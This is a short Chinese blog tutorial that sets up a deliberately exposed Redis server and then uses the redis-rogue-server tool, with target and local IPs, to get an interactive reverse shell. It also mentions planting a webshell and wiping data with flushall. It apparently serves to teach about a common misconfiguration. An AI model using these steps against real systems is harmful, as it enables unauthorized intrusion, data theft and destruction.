Redis未授權訪問反彈shell

0x01:前言

這是10月份寫的文章 一直放到電腦上居然忘掉了 我丟!!

Redis是一個開源的使用ANSI C語言編寫、支持網絡、可基於內存亦可持久化的日誌型、Key-Value數據庫,並提供多種語言的API。從2010年3月15日起,Redis的開發工作由VMware主持。從2013年5月開始,Redis的開發由Pivotal贊助。

Redis因配置不當可以未授權訪問(竊取數據、反彈shell、數據備份操作主從複製、命令執行)。攻擊者無需認證訪問到內部數據,可導致敏感信息泄露,也可以惡意執行flushall來清空所有數據。攻擊者可通過EVAL執行lua代碼,或通過數據備份功能往磁盤寫入後門文件。

 

0x02. 安裝redis

 

wget http://download.redis.io/releases/redis-3.2.0.tar.gz

tar -xvzf redis-3.2.0.tar.gz

cd redis-3.2.0

make

0x03 修改配置文件

 

vim redis.conf

bind 127.0.0.1前面加上#號       # bind 127.0.0.1

protected-mode設爲no         protected-mode no

 

啓動redis-server    

./src/redis-service

默認的配置是使用6379端口,沒有密碼。這時候會導致未授權訪問然後使用redis權限寫文件!!

 

0x04 攻擊利用

利用工具:https://github.com/n0b0dyCN/redis-rogue-server

git clone https://github.com/n0b0dyCN/redis-rogue-server.git

cd redis-rogue-server/RedisModulesSDK/exp

make

cd ../../

python3 redis-rogue-server.py --rhost  目標ip  --lhost 本地ip

 

成功建立連接 輸入 i 得到一個交互式 Shell、可以直接輸入命令

0x05  攻擊利用x2

 

也可以在網站目錄寫入 webshell

 

直接訪問 即可 !!

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章